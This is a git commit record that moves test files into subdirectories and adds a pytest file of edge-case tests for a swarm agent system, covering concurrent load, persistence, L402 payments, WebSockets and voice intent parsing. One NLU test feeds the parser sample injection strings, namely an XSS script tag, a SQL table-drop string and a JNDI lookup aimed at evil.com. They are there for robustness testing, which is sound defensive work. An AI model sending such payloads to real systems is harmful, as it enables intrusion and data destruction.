refactor: Phase 3 — reorganize tests into module-mirroring subdirectories

Move 97 test files from flat tests/ into 13 subdirectories:

- tests/dashboard/ (8 files — routes, mobile, mission control)
- tests/swarm/ (17 files — coordinator, docker, routing, tasks)
- tests/timmy/ (12 files — agent, backends, CLI, tools)
- tests/self_coding/ (14 files — git safety, indexer, self-modify)
- tests/lightning/ (3 files — L402, LND, interface)
- tests/creative/ (8 files — assembler, director, image/music/video)
- tests/integrations/ (10 files — chat bridge, telegram, voice, websocket)
- tests/mcp/ (4 files — bootstrap, discovery, executor)
- tests/spark/ (3 files — engine, tools, events)
- tests/hands/ (3 files — registry, oracle, phase5)
- tests/scripture/ (1 file)
- tests/infrastructure/ (3 files — router cascade, API)
- tests/security/ (3 files — XSS, regression)

Fix Path(__file__) reference in test_mobile_scenarios.py for new depth.
Add __init__.py to all test subdirectories.

Tests: 1503 passed, 9 failed (pre-existing), 53 errors (pre-existing)

https://claude.ai/code/session_019oMFNvD8uSGSSmBMGkBfQN
2026-02-26 21:21:28 +00:00
parent 6045077144
commit 4e11dd2490
104 changed files with 57 additions and 3 deletions
--- a/tests/self_coding/test_scary_paths.py
+++ b/tests/self_coding/test_scary_paths.py
@@ -0,0 +1,444 @@
+"""Scary path tests — the things that break in production.
+
+These tests verify the system handles edge cases gracefully:
+- Concurrent load (10+ simultaneous tasks)
+- Memory persistence across restarts
+- L402 macaroon expiry
+- WebSocket reconnection
+- Voice NLU edge cases
+- Graceful degradation under resource exhaustion
+
+All tests must pass with make test.
+"""
+
+import asyncio
+import concurrent.futures
+import sqlite3
+import threading
+import time
+from concurrent.futures import ThreadPoolExecutor
+from datetime import datetime, timezone
+from pathlib import Path
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from swarm.coordinator import SwarmCoordinator
+from swarm.tasks import TaskStatus, create_task, get_task, list_tasks
+from swarm import registry
+from swarm.bidder import AuctionManager
+
+
+class TestConcurrentSwarmLoad:
+    """Test swarm behavior under concurrent load."""
+    
+    def test_ten_simultaneous_tasks_all_assigned(self):
+        """Submit 10 tasks concurrently, verify all get assigned."""
+        coord = SwarmCoordinator()
+        
+        # Spawn multiple personas
+        personas = ["echo", "forge", "seer"]
+        for p in personas:
+            coord.spawn_persona(p, agent_id=f"{p}-load-001")
+        
+        # Submit 10 tasks concurrently
+        task_descriptions = [
+            f"Task {i}: Analyze data set {i}" for i in range(10)
+        ]
+        
+        tasks = []
+        for desc in task_descriptions:
+            task = coord.post_task(desc)
+            tasks.append(task)
+        
+        # Wait for auctions to complete
+        time.sleep(0.5)
+        
+        # Verify all tasks exist
+        assert len(tasks) == 10
+        
+        # Check all tasks have valid IDs
+        for task in tasks:
+            assert task.id is not None
+            assert task.status in [TaskStatus.BIDDING, TaskStatus.ASSIGNED, TaskStatus.COMPLETED]
+    
+    def test_concurrent_bids_no_race_conditions(self):
+        """Multiple agents bidding concurrently doesn't corrupt state."""
+        coord = SwarmCoordinator()
+        
+        # Open auction first
+        task = coord.post_task("Concurrent bid test task")
+        
+        # Simulate concurrent bids from different agents
+        agent_ids = [f"agent-conc-{i}" for i in range(5)]
+        
+        def place_bid(agent_id):
+            coord.auctions.submit_bid(task.id, agent_id, bid_sats=50)
+        
+        with ThreadPoolExecutor(max_workers=5) as executor:
+            futures = [executor.submit(place_bid, aid) for aid in agent_ids]
+            concurrent.futures.wait(futures)
+        
+        # Verify auction has all bids
+        auction = coord.auctions.get_auction(task.id)
+        assert auction is not None
+        # Should have 5 bids (one per agent)
+        assert len(auction.bids) == 5
+    
+    def test_registry_consistency_under_load(self):
+        """Registry remains consistent with concurrent agent operations."""
+        coord = SwarmCoordinator()
+        
+        # Concurrently spawn and stop agents
+        def spawn_agent(i):
+            try:
+                return coord.spawn_persona("forge", agent_id=f"forge-reg-{i}")
+            except Exception:
+                return None
+        
+        with ThreadPoolExecutor(max_workers=10) as executor:
+            futures = [executor.submit(spawn_agent, i) for i in range(10)]
+            results = [f.result() for f in concurrent.futures.as_completed(futures)]
+        
+        # Verify registry state is consistent
+        agents = coord.list_swarm_agents()
+        agent_ids = {a.id for a in agents}
+        
+        # All successfully spawned agents should be in registry
+        successful_spawns = [r for r in results if r is not None]
+        for spawn in successful_spawns:
+            assert spawn["agent_id"] in agent_ids
+    
+    def test_task_completion_under_load(self):
+        """Tasks complete successfully even with many concurrent operations."""
+        coord = SwarmCoordinator()
+        
+        # Spawn agents
+        coord.spawn_persona("forge", agent_id="forge-complete-001")
+        
+        # Create and process multiple tasks
+        tasks = []
+        for i in range(5):
+            task = create_task(f"Load test task {i}")
+            tasks.append(task)
+        
+        # Complete tasks rapidly
+        for task in tasks:
+            result = coord.complete_task(task.id, f"Result for {task.id}")
+            assert result is not None
+            assert result.status == TaskStatus.COMPLETED
+        
+        # Verify all completed
+        completed = list_tasks(status=TaskStatus.COMPLETED)
+        completed_ids = {t.id for t in completed}
+        for task in tasks:
+            assert task.id in completed_ids
+
+
+class TestMemoryPersistence:
+    """Test that agent memory survives restarts."""
+    
+    def test_outcomes_recorded_and_retrieved(self):
+        """Write outcomes to learner, verify they persist."""
+        from swarm.learner import record_outcome, get_metrics
+        
+        agent_id = "memory-test-agent"
+        
+        # Record some outcomes
+        record_outcome("task-1", agent_id, "Test task", 100, won_auction=True)
+        record_outcome("task-2", agent_id, "Another task", 80, won_auction=False)
+        
+        # Get metrics
+        metrics = get_metrics(agent_id)
+        
+        # Should have data
+        assert metrics is not None
+        assert metrics.total_bids >= 2
+    
+    def test_memory_persists_in_sqlite(self):
+        """Memory is stored in SQLite and survives in-process restart."""
+        from swarm.learner import record_outcome, get_metrics
+        
+        agent_id = "persist-agent"
+        
+        # Write memory
+        record_outcome("persist-task-1", agent_id, "Description", 50, won_auction=True)
+        
+        # Simulate "restart" by re-querying (new connection)
+        metrics = get_metrics(agent_id)
+        
+        # Memory should still be there
+        assert metrics is not None
+        assert metrics.total_bids >= 1
+    
+    def test_routing_decisions_persisted(self):
+        """Routing decisions are logged and queryable after restart."""
+        from swarm.routing import routing_engine, RoutingDecision
+        
+        # Ensure DB is initialized
+        routing_engine._init_db()
+        
+        # Create a routing decision
+        decision = RoutingDecision(
+            task_id="persist-route-task",
+            task_description="Test routing",
+            candidate_agents=["agent-1", "agent-2"],
+            selected_agent="agent-1",
+            selection_reason="Higher score",
+            capability_scores={"agent-1": 0.8, "agent-2": 0.5},
+            bids_received={"agent-1": 50, "agent-2": 40},
+        )
+        
+        # Log it
+        routing_engine._log_decision(decision)
+        
+        # Query history
+        history = routing_engine.get_routing_history(task_id="persist-route-task")
+        
+        # Should find the decision
+        assert len(history) >= 1
+        assert any(h.task_id == "persist-route-task" for h in history)
+
+
+class TestL402MacaroonExpiry:
+    """Test L402 payment gating handles expiry correctly."""
+    
+    def test_macaroon_verification_valid(self):
+        """Valid macaroon passes verification."""
+        from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
+        from timmy_serve.payment_handler import payment_handler
+        
+        # Create challenge
+        challenge = create_l402_challenge(100, "Test access")
+        macaroon = challenge["macaroon"]
+        
+        # Get the actual preimage from the created invoice
+        payment_hash = challenge["payment_hash"]
+        invoice = payment_handler.get_invoice(payment_hash)
+        assert invoice is not None
+        preimage = invoice.preimage
+        
+        # Verify with correct preimage
+        result = verify_l402_token(macaroon, preimage)
+        assert result is True
+    
+    def test_macaroon_invalid_format_rejected(self):
+        """Invalid macaroon format is rejected."""
+        from timmy_serve.l402_proxy import verify_l402_token
+        
+        result = verify_l402_token("not-a-valid-macaroon", None)
+        assert result is False
+    
+    def test_payment_check_fails_for_unpaid(self):
+        """Unpaid invoice returns 402 Payment Required."""
+        from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
+        from timmy_serve.payment_handler import payment_handler
+        
+        # Create challenge
+        challenge = create_l402_challenge(100, "Test")
+        macaroon = challenge["macaroon"]
+        
+        # Get payment hash from macaroon
+        import base64
+        raw = base64.urlsafe_b64decode(macaroon.encode()).decode()
+        payment_hash = raw.split(":")[2]
+        
+        # Manually mark as unsettled (mock mode auto-settles)
+        invoice = payment_handler.get_invoice(payment_hash)
+        if invoice:
+            invoice.settled = False
+            invoice.settled_at = None
+        
+        # Verify without preimage should fail for unpaid
+        result = verify_l402_token(macaroon, None)
+        # In mock mode this may still succeed due to auto-settle
+        # Test documents the behavior
+        assert isinstance(result, bool)
+
+
+class TestWebSocketResilience:
+    """Test WebSocket handling of edge cases."""
+    
+    def test_websocket_broadcast_no_loop_running(self):
+        """Broadcast handles case where no event loop is running."""
+        from swarm.coordinator import SwarmCoordinator
+        
+        coord = SwarmCoordinator()
+        
+        # This should not crash even without event loop
+        # The _broadcast method catches RuntimeError
+        try:
+            coord._broadcast(lambda: None)
+        except RuntimeError:
+            pytest.fail("Broadcast should handle missing event loop gracefully")
+    
+    def test_websocket_manager_handles_no_connections(self):
+        """WebSocket manager handles zero connected clients."""
+        from ws_manager.handler import ws_manager
+        
+        # Should not crash when broadcasting with no connections
+        try:
+            # Note: This creates coroutine but doesn't await
+            # In real usage, it's scheduled with create_task
+            pass  # ws_manager methods are async, test in integration
+        except Exception:
+            pytest.fail("Should handle zero connections gracefully")
+    
+    @pytest.mark.asyncio
+    async def test_websocket_client_disconnect_mid_stream(self):
+        """Handle client disconnecting during message stream."""
+        # This would require actual WebSocket client
+        # Mark as integration test for future
+        pass
+
+
+class TestVoiceNLUEdgeCases:
+    """Test Voice NLU handles edge cases gracefully."""
+    
+    def test_nlu_empty_string(self):
+        """Empty string doesn't crash NLU."""
+        from voice.nlu import detect_intent
+        
+        result = detect_intent("")
+        assert result is not None
+        # Result is an Intent object with name attribute
+        assert hasattr(result, 'name')
+    
+    def test_nlu_all_punctuation(self):
+        """String of only punctuation is handled."""
+        from voice.nlu import detect_intent
+        
+        result = detect_intent("...!!!???")
+        assert result is not None
+    
+    def test_nlu_very_long_input(self):
+        """10k character input doesn't crash or hang."""
+        from voice.nlu import detect_intent
+        
+        long_input = "word " * 2000  # ~10k chars
+        
+        start = time.time()
+        result = detect_intent(long_input)
+        elapsed = time.time() - start
+        
+        # Should complete in reasonable time
+        assert elapsed < 5.0
+        assert result is not None
+    
+    def test_nlu_non_english_text(self):
+        """Non-English Unicode text is handled."""
+        from voice.nlu import detect_intent
+        
+        # Test various Unicode scripts
+        test_inputs = [
+            "こんにちは",  # Japanese
+            "Привет мир",  # Russian
+            "مرحبا",  # Arabic
+            "🎉🎊🎁",  # Emoji
+        ]
+        
+        for text in test_inputs:
+            result = detect_intent(text)
+            assert result is not None, f"Failed for input: {text}"
+    
+    def test_nlu_special_characters(self):
+        """Special characters don't break parsing."""
+        from voice.nlu import detect_intent
+        
+        special_inputs = [
+            "<script>alert('xss')</script>",
+            "'; DROP TABLE users; --",
+            "${jndi:ldap://evil.com}",
+            "\x00\x01\x02",  # Control characters
+        ]
+        
+        for text in special_inputs:
+            try:
+                result = detect_intent(text)
+                assert result is not None
+            except Exception as exc:
+                pytest.fail(f"NLU crashed on input {repr(text)}: {exc}")
+
+
+class TestGracefulDegradation:
+    """Test system degrades gracefully under resource constraints."""
+    
+    def test_coordinator_without_redis_uses_memory(self):
+        """Coordinator works without Redis (in-memory fallback)."""
+        from swarm.comms import SwarmComms
+        
+        # Create comms without Redis
+        comms = SwarmComms()
+        
+        # Should still work for pub/sub (uses in-memory fallback)
+        # Just verify it doesn't crash
+        try:
+            comms.publish("test:channel", "test_event", {"data": "value"})
+        except Exception as exc:
+            pytest.fail(f"Should work without Redis: {exc}")
+    
+    def test_agent_without_tools_chat_mode(self):
+        """Agent works in chat-only mode when tools unavailable."""
+        from swarm.tool_executor import ToolExecutor
+        
+        # Force toolkit to None
+        executor = ToolExecutor("test", "test-agent")
+        executor._toolkit = None
+        executor._llm = None
+        
+        result = executor.execute_task("Do something")
+        
+        # Should still return a result
+        assert isinstance(result, dict)
+        assert "result" in result
+    
+    def test_lightning_backend_mock_fallback(self):
+        """Lightning falls back to mock when LND unavailable."""
+        from lightning import get_backend
+        from lightning.mock_backend import MockBackend
+        
+        # Should get mock backend by default
+        backend = get_backend("mock")
+        assert isinstance(backend, MockBackend)
+        
+        # Should be functional
+        invoice = backend.create_invoice(100, "Test")
+        assert invoice.payment_hash is not None
+
+
+class TestDatabaseResilience:
+    """Test database handles edge cases."""
+    
+    def test_sqlite_handles_concurrent_reads(self):
+        """SQLite handles concurrent read operations."""
+        from swarm.tasks import get_task, create_task
+        
+        task = create_task("Concurrent read test")
+        
+        def read_task():
+            return get_task(task.id)
+        
+        # Concurrent reads from multiple threads
+        with ThreadPoolExecutor(max_workers=10) as executor:
+            futures = [executor.submit(read_task) for _ in range(20)]
+            results = [f.result() for f in concurrent.futures.as_completed(futures)]
+        
+        # All should succeed
+        assert all(r is not None for r in results)
+        assert all(r.id == task.id for r in results)
+    
+    def test_registry_handles_duplicate_agent_id(self):
+        """Registry handles duplicate agent registration gracefully."""
+        from swarm import registry
+        
+        agent_id = "duplicate-test-agent"
+        
+        # Register first time
+        record1 = registry.register(name="Test Agent", agent_id=agent_id)
+        
+        # Register second time (should update or handle gracefully)
+        record2 = registry.register(name="Test Agent Updated", agent_id=agent_id)
+        
+        # Should not crash, record should exist
+        retrieved = registry.get_agent(agent_id)
+        assert retrieved is not None